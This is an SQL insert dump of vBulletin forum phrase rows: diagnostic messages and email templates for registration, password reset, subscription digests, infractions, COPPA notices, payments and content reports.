(34101, -1, 'unable_to_copy_attached_file', 'diagnostic', 'The attached file could not be copied to {1}. PHP\'s safe_mode setting must be disabled for uploads to function. You will need to contact your host for this to be changed.', 'vbulletin', '', 0, ''),
(34102, -1, 'unable_to_find_attached_file', 'diagnostic', 'The attached file\'s temporary location ({1}) could not be found. {2}', 'vbulletin', '', 0, ''),
(34103, -1, 'unable_to_open_directory', 'diagnostic', 'Unable to open directory', 'vbulletin', '', 0, ''),
(34104, -1, 'unable_to_open_x', 'diagnostic', 'Unable to open file: {1} ', 'vbulletin', '', 0, ''),
(34105, -1, 'upload_test_desc', 'diagnostic', 'This test\'s purpose is to determine if there are any vBulletin/PHP options you need to change for uploads to function correctly. To begin, simply attach a small file using the box below and submit the form. vBulletin will not save the attached file in anyway.', 'vbulletin', '', 0, ''),
(34106, -1, 'vbulletin_email_test', 'diagnostic', 'vBulletin Email Test', 'vbulletin', '', 0, ''),
(34107, -1, 'vbulletin_email_test_msg', 'diagnostic', 'You are receiving this email because your email address was entered as an email test at {1}.\r\n\r\nThe first step of this email test script has been completed. However, a formatting test is still necessary:\r\n\r\nA paragraph break.\r\nA single line break.\r\n\r\nAnother paragraph break.\r\nAnother single line break.\r\nAnother single line break.\r\n\r\nIf the above lines look correct, you are finished. The email features on your server are setup correctly.\r\nIf this email is run together on one line, there is possibly a configuration error with your mail server. Please ensure it is configured correctly.', 'vbulletin', '', 0, ''),
(34108, -1, 'vbulletin_email_test_withf', 'diagnostic', 'vBulletin Email Test (With -f Parameter)', 'vbulletin', '', 0, ''),
(34109, -1, 'version', 'diagnostic', 'Version', 'vbulletin', '', 0, ''),
(34110, -1, 'accountlocked', 'emailbody', 'Dear $user[username],\r\n\r\nSomeone has tried to log into your account on $vboptions[bbtitle] with an incorrect password at least 5 times. This person has been prevented from attempting to login to your account for the next 15 minutes.\r\n\r\nThe person trying to log into your account had the following IP address: $ip\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1208441696, '3.7.0 Release Candidate 4'),
(34111, -1, 'activateaccount', 'emailbody', 'Dear $username,\r\n\r\nThank you for registering at the $vboptions[bbtitle]. Before we can activate your account one last step must be taken to complete your registration.\r\n\r\nPlease note - you must complete this last step to become a registered member. You will only need to visit this URL once to activate your account.\r\n\r\nTo complete your registration, please visit this URL:\r\n$vboptions[bburl]/register.php?a=act&u=$userid&i=$activateid\r\n\r\nAmerica Online Users Please Visit Here to be Activated \r\n\r\n**** Does The Above URL Not Work? ****\r\nIf the above URL does not work, please use your Web browser to go to:\r\n$vboptions[bburl]/register.php?a=ver\r\n\r\nPlease be sure not to add extra spaces. You will need to type in your username and activation number on the page that appears when you visit the URL.\r\n\r\nYour Username is: $username\r\nYour Activation ID is: $activateid\r\n\r\nIf you are still having problems signing up please contact a member of our support staff at $vboptions[webmasteremail]\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n\r\n--------------------\r\nTo stop receiving this email, please visit this URL:\r\n$vboptions[bburl]/register.php?do=deleteactivation&u=$userid&i=$activateid ', 'vbulletin', 'vBulletin Solutions', 1205943168, '3.7.0 Release Candidate 1'),
(34112, -1, 'activateaccount_change', 'emailbody', 'Dear $username,\r\n\r\nSince you have recently changed your email, we require that you verify your new email address. You will only need to visit the URL once to have your account updated.\r\n\r\nTo complete reverification, please visit this URL:\r\n$vboptions[bburl]/register.php?a=act&u=$userid&i=$activateid\r\n\r\nAmerica Online Users Please Visit Here to be Activated \r\n\r\n**** Does The Above URL Not Work? ****\r\nIf the above URL does not work, please use your Web browser to go to:\r\n$vboptions[bburl]/register.php?a=ver\r\n\r\nPlease to be sure not to add extra spaces. You will need to type in your username and activation number on the page that appears when you visit the url.\r\n\r\nYour Username is: $username\r\nYour Activation ID is: $activateid\r\n\r\nIf you are still having problems verifying please contact a member of our support staff at $vboptions[webmasteremail]\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n\r\n--------------------\r\nTo stop receiving this email, please visit this URL:\r\n$vboptions[bburl]/register.php?do=deleteactivation&u=$userid&i=$activateid', 'vbulletin', 'vBulletin Solutions', 1205943249, '3.7.0 Release Candidate 1'),
(34113, -1, 'attachfull', 'emailbody', '$bbuserinfo[username] has just tried to attach a file that would exceed the $vboptions[attachtotalspace] byte quota you setup by $overage.\r\n\r\nIn order to allow users to continue attaching files, we recommend you delete some attachments. You can perform attachment management on the following pages:\r\n\r\n$vboptions[bburl]/$admincpdir/attachment.php?do=intro\r\n$vboptions[bburl]/$admincpdir/attachment.php?do=stats', 'vbulletin', '', 0, ''),
(34114, -1, 'birthday', 'emailbody', 'Hello $username,\r\n\r\nWe at $vboptions[bbtitle] would like to wish you a happy birthday today!', 'vbulletin', '', 0, ''),
(34115, -1, 'contactus', 'emailbody', 'The following message was sent to you via the $vboptions[bbtitle] Contact Us form by $name ( mailto:$email ).\r\n\r\n--------------------------------\r\n\r\n$message\r\n\r\n--------------------------------\r\n\r\nReferring Page: $url\r\nIP Address: $ip\r\nUser Name: $bbuserinfo[username]\r\nUser ID: $bbuserinfo[userid]\r\nEmail: $email', 'vbulletin', 'vBulletin Solutions', 1197640651, '3.7.0 Beta 2'),
(34116, -1, 'digestforum', 'emailbody', 'Dear $forum[username],\r\n\r\nYou are subscribed to the forum $forum[title_clean], there have been $newthreads new thread(s) and $updatedthreads updated thread(s).\r\n$vboptions[bburl]/forumdisplay.php?f=$forum[forumid]\r\n\r\nThe following threads are new:\r\n$newthreadbits\r\n\r\nThe following threads have been updated:\r\n$updatedthreadbits\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this forum, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=removesubscription&type=forum&subscriptionid=$forum[subscribeforumid]&auth=$forum[auth]\r\n', 'vbulletin', 'vBulletin Solutions', 1150508988, '3.6.0 Beta 3'),
(34117, -1, 'digestgroup', 'emailbody', 'Dear $group[username],\r\n\r\nYou are subscribed to the group $group[name], there have been $new_discussions new discussion(s) and $updated_discussions updated discussions(s).\r\n$vboptions[bburl]/group.php?groupid=$group[groupid]\r\n\r\nThe following discussions are new:\r\n$new_discussion_bits\r\n\r\nThe following discussions have been updated:\r\n$updated_discussion_bits\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1234791622, '3.8.2'),
(34118, -1, 'digestgroupbit', 'emailbody', '************\r\n$discussion[title]\r\n$vboptions[bburl]/group.php?do=discuss&discussionid=$discussion[discussionid]\r\nIn group: $group[name]\r\nStarted by: $discussion[postusername]\r\nLast post: $discussion[lastreplydate] $discussion[lastreplytime]', 'vbulletin', 'vBulletin Solutions', 1234791633, '3.8.2'),
(34119, -1, 'digestpostbit', 'emailbody', '************\r\n$post[title]\r\n$vboptions[bburl]/showthread.php?p=$post[postid]#post$post[postid]\r\nPosted by: $post[postusername]\r\nOn: $post[postdate] $post[posttime]\r\n\r\n$post[pagetext]\r\n', 'vbulletin', '', 0, ''),
(34120, -1, 'digestthread', 'emailbody', 'Dear $thread[username],\r\n\r\nYou are subscribed to the thread \"$thread[prefix_plain]$thread[title]\" by $thread[postusername], there have been $thread[newposts] post(s) to this thread, the last poster was $thread[lastposter].\r\n$vboptions[bburl]/showthread.php?t=$thread[threadid]\r\n\r\nThese following posts were made to the thread:\r\n$postbits\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this thread, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=removesubscription&type=thread&subscriptionid=$thread[subscribethreadid]&auth=$thread[auth]\r\n', 'vbulletin', 'vBulletin Solutions', 1189591905, '3.6.8'),
(34121, -1, 'digestthreadbit', 'emailbody', '************\r\n$thread[prefix_plain]$thread[title]\r\n$vboptions[bburl]/showthread.php?t=$thread[threadid]\r\nIn forum: $thread[forumtitle]\r\nStarted by: $thread[postusername]\r\nLast post: $thread[lastreplydate] $thread[lastreplytime]\r\n', 'vbulletin', 'vBulletin Solutions', 1189592036, '3.6.8'),
(34122, -1, 'friendship_request_email', 'emailbody', 'Dear $userinfo[username],\r\n\r\n$fromuserinfo[username] has requested that you become friends. You can approve or deny this request by visiting:\r\n\r\n$vboptions[bburl]/profile.php?do=buddylist\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1209745496, '3.7.1'),
(34123, -1, 'infraction_post', 'emailbody', 'This infraction has been reversed.\r\n\r\nReason: [quote]$infractioninfo[reason][/quote]', 'vbulletin', 'vBulletin Solutions', 1149280670, '3.6.0 Beta 1'),
(34124, -1, 'infraction_received_post', 'emailbody', 'Dear $infraction[username],\r\n\r\nYou have received an infraction at $vboptions[bbtitle].\r\n\r\nReason: $infraction[reason]\r\n-------\r\n$infraction[message]\r\n-------\r\n\r\nThis infraction is worth $infraction[points] point(s) and may result in restricted access until it expires. Serious infractions will never expire.\r\n\r\nOriginal Post:\r\n$infraction[post]\r\n[quote]$infraction[pagetext][/quote]\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1166747689, '3.6.5'),
(34125, -1, 'infraction_received_profile', 'emailbody', 'Dear $infraction[username],\r\n\r\nYou have received an infraction at $vboptions[bbtitle].\r\n\r\nReason: $infraction[reason]\r\n-------\r\n$infraction[message]\r\n-------\r\n\r\nThis infraction is worth $infraction[points] point(s) and may result in restricted access until it expires. Serious infractions will never expire.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1166744440, '3.6.5'),
(34126, -1, 'infraction_thread_post', 'emailbody', 'Post: [url=$vboptions[bburl]/showthread.php?p=$postinfo[postid]]$infractioninfo[prefix_plain]$infractioninfo[threadtitle][/url]\r\nUser: [url=$vboptions[bburl]/member.php?u=$userinfo[userid]]$infractioninfo[username][/url]\r\nInfraction: $infractioninfo[title]\r\nPoints: $infractioninfo[points]\r\n\r\nAdministrative Note:[quote]$infractioninfo[note][/quote]\r\n\r\n\r\nMessage to User:[quote]$infractioninfo[message][/quote]\r\n\r\n\r\nOriginal Post: [quote]$postinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1210933574, '3.7.1'),
(34127, -1, 'infraction_thread_profile', 'emailbody', 'User: [url=$vboptions[bburl]/member.php?u=$userinfo[userid]]$infractioninfo[username][/url]\r\nInfraction: $infractioninfo[title]\r\nPoints: $infractioninfo[points]\r\n\r\nAdministrative Note:[quote]$infractioninfo[note][/quote]\r\n\r\n\r\nMessage to User:[quote]$infractioninfo[message][/quote]', 'vbulletin', 'vBulletin Solutions', 1210933583, '3.7.1'),
(34128, -1, 'lostpw', 'emailbody', 'Dear $user[username],\r\n\r\nYou have requested to reset your password on $vboptions[bbtitle] because you have forgotten your password. If you did not request this, please ignore it. It will expire and become useless in 24 hours time.\r\n\r\nTo reset your password, please visit the following page:\r\n$vboptions[bburl]/login.php?a=pwd&u=$user[userid]&i=$user[activationid]\r\n\r\nWhen you visit that page, your password will be reset, and the new password will be emailed to you.\r\n\r\nYour username is: $user[username]\r\n\r\nTo edit your profile, go to this page:\r\n$vboptions[bburl]/profile.php?do=editprofile\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34129, -1, 'moderation_deleted', 'emailbody', 'Dear $username,\r\n\r\nUnfortunately your registration at $vboptions[bbtitle] did not meet our membership requirements. Therefore your registration was deleted.\r\n\r\nSorry,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34130, -1, 'moderation_validated', 'emailbody', 'Dear $username,\r\n\r\nWe have now activated your account at the $vboptions[bbtitle]. The forums can be found here:\r\n\r\n$vboptions[bburl]/$vboptions[forumhome].php\r\n\r\nYour login details are as follows:\r\nUsername: $username\r\nPassword: as you entered it when you registered\r\n\r\nDon\'t forget that your password is case sensitive.\r\n\r\nTo edit your profile, please visit this page:\r\n$vboptions[bburl]/profile.php?do=editprofile\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34131, -1, 'moderator', 'emailbody', 'Hello,\r\n\r\n$bbuserinfo[username] has just posted in the $foruminfo[title_clean] forum of $vboptions[bbtitle] under the title of $threadinfo[prefix_plain]$threadinfo[title].\r\n\r\nThis thread is located at $vboptions[bburl]/showthread.php?t=$threadinfo[threadid]\r\n\r\nHere is the message that has just been posted:\r\n***************\r\n$post[message]\r\n***************', 'vbulletin', 'vBulletin Solutions', 1189605367, '3.6.8'),
(34132, -1, 'newevent', 'emailbody', 'Hello,\r\n\r\n$bbuserinfo[username] has just posted in the $calendarinfo[title] calendar of $vboptions[bbtitle] under the title of $title.\r\n\r\nThis event is located at $vboptions[bburl]/calendar.php?do=getinfo&e=$eventid\r\n\r\nHere is the event that has just been posted:\r\n***************\r\n$eventmessage\r\n***************', 'vbulletin', '', 0, ''),
(34133, -1, 'newuser', 'emailbody', 'There is a new user, $username at $vboptions[bbtitle]\r\n\r\nTo view their profile, go here:\r\n\r\n$vboptions[bburl]/member.php?u=$userid\r\n\r\nEmail Address : $email\r\nBirthday : $birthday\r\nReferrer: $referrer\r\nIP Address: $ipaddress\r\n\r\n$customfields', 'vbulletin', 'vBulletin Solutions', 1147896422, '3.6.0 Beta 1'),
(34134, -1, 'notify', 'emailbody', 'Dear $touser[username],\r\n\r\n$bbuserinfo[username] has just replied to a thread you have subscribed to entitled - $threadinfo[prefix_plain]$threadinfo[title] - in the $foruminfo[title_clean] forum of $vboptions[bbtitle].\r\n\r\nThis thread is located at:\r\n$vboptions[bburl]/showthread.php?t=$threadinfo[threadid]&goto=newpost\r\n\r\nHere is the message that has just been posted:\r\n***************\r\n$pagetext\r\n***************\r\n\r\n\r\nThere may also be other replies, but you will not receive any more notifications until you visit the forum again.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this thread, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=removesubscription&type=thread&subscriptionid=$touser[subscribethreadid]&auth=$touser[auth]\r\n\r\nTo unsubscribe from ALL threads, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=viewsubscription&folderid=all\r\n', 'vbulletin', 'vBulletin Solutions', 1189592553, '3.6.8'),
(34135, -1, 'notify_discussion', 'emailbody', 'Dear $touser[username],\r\n\r\n$bbuserinfo[username] has replied to a social group discussion you have subscribed to entitled - $discussion[title] - in the $group[name] group of $vboptions[bbtitle].\r\n\r\nThis discussion is located at:\r\n$vboptions[bburl]/group.php?do=discuss&discussionid=$discussion[discussionid]&goto=newpost\r\n\r\nHere is the message that has just been posted:\r\n***************\r\n$pagetext\r\n***************\r\n\r\n\r\nThere may also be other replies, but you will not receive any more notifications until you visit the forum again.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this discussion, please visit this page:\r\n$vboptions[bburl]/group.php?do=unsubscribe&subscriptionid=$touser[subscribediscussionid]&auth=$touser[auth]\r\n\r\nTo unsubscribe from ALL discussions, please visit this page:\r\n$vboptions[bburl]/groupsubscription.php\r\n\r\nTo unsubscribe from ALL forum threads, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=viewsubscription&folderid=all', 'vbulletin', 'vBulletin Solutions', 1225800231, '3.8.0 Beta 2'),
(34136, -1, 'paidsubscription_reminder', 'emailbody', 'Dear $username,\r\n\r\nYour access to the paid subscription \"$subscription_title\" is about to expire.\r\n\r\nIf you have selected a recurring subscription you will be automatically billed for the renewal, else to renew this subscription you must visit $vboptions[bburl]/payments.php\r\n\r\nIf you do not extend your subscription, access will be removed.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34137, -1, 'parentcoppa_profile', 'emailbody', 'Dear Parent/Guardian of $username,\r\n\r\n$username has just modified their account at $vboptions[bbtitle]. This can be found at:\r\n\r\n$vboptions[bburl]/$vboptions[forumhome].php\r\n\r\nThis email has been sent to you because $username has stated that they are younger than 13 years of age and $vboptions[bbtitle] is in compliance with the Children\'s Online Privacy Protection Act of 1998 (COPPA).\r\n\r\nTo find out more about COPPA, please visit this page:\r\nhttp://www.ftc.gov/opa/1999/10/childfinal.htm\r\n\r\nPlease read the $vboptions[bbtitle] Privacy Statement also:\r\n$vboptions[privacyurl]\r\n\r\n$username\'s profile can be viewed at:\r\n\r\n$vboptions[bburl]/member.php?u=$userid\r\n\r\nWe thank you for helping us in keeping the privacy of children on the internet.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1202918875, '3.7.0 Beta 5'),
(34138, -1, 'parentcoppa_register', 'emailbody', 'Dear Parent/Guardian of $username,\r\n\r\n$username has just signed up for an account at $vboptions[bbtitle]. This can be found at:\r\n\r\n$vboptions[bburl]/$vboptions[forumhome].php\r\n\r\nThis email has been sent to you because $username has stated that they are younger than 13 years of age and $vboptions[bburl] is in compliance with the Children\'s Online Privacy Protection Act of 1998 (COPPA).\r\n\r\nTo find out more about COPPA, please visit this page:\r\nhttp://www.ftc.gov/opa/1999/10/childfinal.htm\r\n\r\nPlease read the $vboptions[bbtitle] Privacy Statement also:\r\n$vboptions[privacyurl]\r\n\r\nYou must print out the permission form, fill it in and mail or fax it back to the webmaster. Details about how to return the form are on the form itself.\r\n\r\nThe form can be accessed through this page:\r\n\r\n$vboptions[bburl]/profile.php?do=editprofile\r\n\r\nFrom that page, you can also view the profile and make any modification you wish. You will need these login details:\r\n\r\nUsername: $username\r\nPassword: $password\r\n(Note that the password is case sensitive)\r\n\r\nWe thank you for helping us in keeping the privacy of children on the internet.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1202918887, '3.7.0 Beta 5'),
(34139, -1, 'payment_received', 'emailbody', 'A paid subscription has just been purchased by $username at $vboptions[bbtitle]\r\n\r\nTo view their profile, go here:\r\n\r\n$vboptions[bburl]/member.php?u=$userid\r\n\r\nUsername : $username\r\nSubscription : $subscription\r\nAmount: $amount\r\nProcessor: $processor\r\nTransaction ID: $transactionid\r\n', 'vbulletin', 'vBulletin Solutions', 1147381143, '3.6.0 Beta 1'),
(34140, -1, 'payment_reversed', 'emailbody', 'A paid subscription has just been reversed by $username at $vboptions[bbtitle]\r\n\r\nTo view their profile, go here:\r\n\r\n$vboptions[bburl]/member.php?u=$userid\r\n\r\nUsername : $username\r\nSubscription : $subscription\r\nAmount: -$amount\r\nProcessor: $processor\r\nTransaction ID: $transactionid\r\n', 'vbulletin', 'vBulletin Solutions', 1147381159, '3.6.0 Beta 1'),
(34141, -1, 'pmboxalmostfull', 'emailbody', 'Dear $touserinfo[username],\r\n\r\nYour private messages box on $vboptions[bbtitle] has reached 90% of your allowed quota. To ensure that you do not reach 100% of your allowed messages, you should consider archiving or deleting some of your messages. Please visit this page to do so:\r\n$vboptions[bburl]/private.php\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1146508707, '3.6.0 Beta 1'),
(34142, -1, 'pmboxfull', 'emailbody', 'Dear $touserinfo[username],\r\n\r\n$fromusername has just tried to send you a private message. However, your private messages box on $vboptions[bbtitle] has reached the specified quota. In order to receive further private messages, you must delete some messages. Please visit this page to do so:\r\n$vboptions[bburl]/private.php\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''),
(34143, -1, 'pmreceived', 'emailbody', 'DO NOT REPLY TO THIS EMAIL!\r\n***************************\r\n\r\nDear $touserinfo[username],\r\n\r\nYou have received a new private message at $vboptions[bbtitle] from $fromusername, entitled \"$plaintext_title\".\r\n\r\nTo read the original version, respond to, or delete this message, you must log in here:\r\n$vboptions[bburl]/private.php\r\n\r\nThis is the message that was sent:\r\n***************\r\n$plaintext_message\r\n***************\r\n\r\nAgain, please do not reply to this email. You must go to the following page to reply to this private message:\r\n$vboptions[bburl]/private.php\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1155814425, '3.6.1'),
(34144, -1, 'reminder', 'emailbody', 'Dear $username,\r\n\r\nThe following events are scheduled to begin soon at $vboptions[bbtitle].\r\n\r\nUpcoming events:\r\n$reminderbits\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this email, please visit this page and delete any future reminders:\r\n$vboptions[bburl]/calendar.php?do=viewreminder', 'vbulletin', '', 0, ''),
(34145, -1, 'reminderbit', 'emailbody', '************\r\n$eventinfo[title] (In less than $hour hour(s))\r\n$vboptions[bburl]/calendar.php?do=getinfo&e=$eventinfo[eventid]\r\nIn Calendar: $eventinfo[calendar]\r\n', 'vbulletin', '', 0, ''),
(34146, -1, 'reportalbumpicture', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this picture:\r\n\r\n$vboptions[bburl]/album.php?albumid=$reportinfo[albumid]&pictureid=$reportinfo[pictureid]\r\n\r\nThis is part of the album:\r\n\'$reportinfo[albumtitle]\' by $reportinfo[username]\r\n$vboptions[bburl]/album.php?albumid=$reportinfo[albumid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.', 'vbulletin', 'vBulletin Solutions', 1208774772, '3.7.0 Release Candidate 4'),
(34147, -1, 'reportalbumpicture_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported an album picture.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nPicture: [url]$vboptions[bburl]/album.php?albumid=$reportinfo[albumid]&pictureid=$reportinfo[pictureid][/url]\r\nAlbum: [url=$vboptions[bburl]/album.php?albumid=$reportinfo[albumid]]$reportinfo[albumtitle][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]', 'vbulletin', 'vBulletin Solutions', 1196379287, '3.7.0 Beta 1'),
(34148, -1, 'reportgroupmessage', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this post:\r\n\r\n$reportinfo[messagetitle]\r\n$vboptions[bburl]/group.php?gmid=$reportinfo[gmid]#gmessage$reportinfo[gmid]\r\n\r\nThis is part of the social group:\r\n$reportinfo[groupname]\r\n$vboptions[bburl]/group.php?groupid=$reportinfo[groupid]\r\n\r\nIn the discussion:\r\n$reportinfo[discussiontitle]\r\n$vboptions[bburl]/group.php?discussionid=$reportinfo[discussionid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.\r\n\r\nPlease respond to this post as applicable.', 'vbulletin', 'vBulletin Solutions', 1222176930, '3.8.0 Alpha 2'),
(34149, -1, 'reportgroupmessage_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a social group message.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nMessage: [url]$vboptions[bburl]/group.php?gmid=$reportinfo[gmid]#gmessage$reportinfo[gmid][/url]\r\nSocial Group: [url=$vboptions[bburl]/group.php?groupid=$reportinfo[groupid]]$reportinfo[groupname][/url]\r\nDiscussion: [url=$vboptions[bburl]/group.php?discussionid=$reportinfo[discussionid]]$reportinfo[discussiontitle][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1222176951, '3.8.0 Alpha 2'),
(34150, -1, 'reportgrouppicture', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this picture:\r\n\r\n$vboptions[bburl]/group.php?do=picture&groupid=$reportinfo[groupid]&pictureid=$reportinfo[pictureid]\r\n\r\nThis is part of the group:\r\n$reportinfo[groupname]\r\n$vboptions[bburl]/group.php?groupid=$reportinfo[groupid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.', 'vbulletin', 'vBulletin Solutions', 1208774817, '3.7.0 Release Candidate 4'),
(34151, -1, 'reportgrouppicture_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a group picture.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nPicture: [url]$vboptions[bburl]/group.php?do=picture&groupid=$reportinfo[groupid]&pictureid=$reportinfo[pictureid][/url]\r\nGroup: [url=$vboptions[bburl]/group.php?groupid=$reportinfo[groupid]]$reportinfo[groupname][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]', 'vbulletin', 'vBulletin Solutions', 1196378170, '3.7.0 Beta 1'),
(34152, -1, 'reportitem_newpost', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has also reported this item.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]', 'vbulletin', 'vBulletin Solutions', 1196371238, '3.7.0 Beta 1'),
(34153, -1, 'reportpicturecomment', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this picture comment:\r\n\r\n$vboptions[bburl]/$reportinfo[commenturl]\r\n\r\nThis comment was posted by:\r\n$reportinfo[pusername]\r\n$vboptions[bburl]/member.php?u=$reportinfo[puserid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.\r\n\r\nPlease respond to this post as applicable.', 'vbulletin', 'vBulletin Solutions', 1208774837, '3.7.0 Release Candidate 4'),
(34154, -1, 'reportpicturecomment_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a picture comment.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nComment: [url]$vboptions[bburl]/$reportinfo[commenturl][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1199982523, '3.7.0 Beta 3'),
(34155, -1, 'reportpost', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this post:\r\n\r\n$reportinfo[posttitle]\r\n$vboptions[bburl]/showthread.php?p=$reportinfo[postid]#post$reportinfo[postid]\r\n\r\nThis is part of this thread:\r\n$reportinfo[prefix_plain]$reportinfo[threadtitle]\r\n$vboptions[bburl]/showthread.php?t=$reportinfo[threadid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this forum, or all administrators if there are no moderators.\r\n\r\nPlease respond to this post as applicable.', 'vbulletin', 'vBulletin Solutions', 1196370112, '3.7.0 Beta 1'),
(34156, -1, 'reportpost_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a post.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nPost: [url=$vboptions[bburl]/showthread.php?p=$reportinfo[postid]#post$reportinfo[postid]]$reportinfo[prefix_plain]$reportinfo[threadtitle][/url]\r\nForum: $reportinfo[forumtitle]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1196378135, '3.7.0 Beta 1'),
(34157, -1, 'reportprivatemessage', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this private message:\r\n\r\nFrom: $reportinfo[pusername]\r\n$reportinfo[pmtitle]\r\n\r\n$reportinfo[message]\r\n\r\n\r\nYou can view the sender\'s profile and optionally apply infractions or bans by following the link below\r\n$vboptions[bburl]/member.php?u=$reportinfo[puserid]\r\n\r\nThis is the reason that the recipient gave for reporting the message:\r\n$reportinfo[reason]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.', 'vbulletin', 'vBulletin Solutions', 1224680828, '3.8.0 Beta 2'),
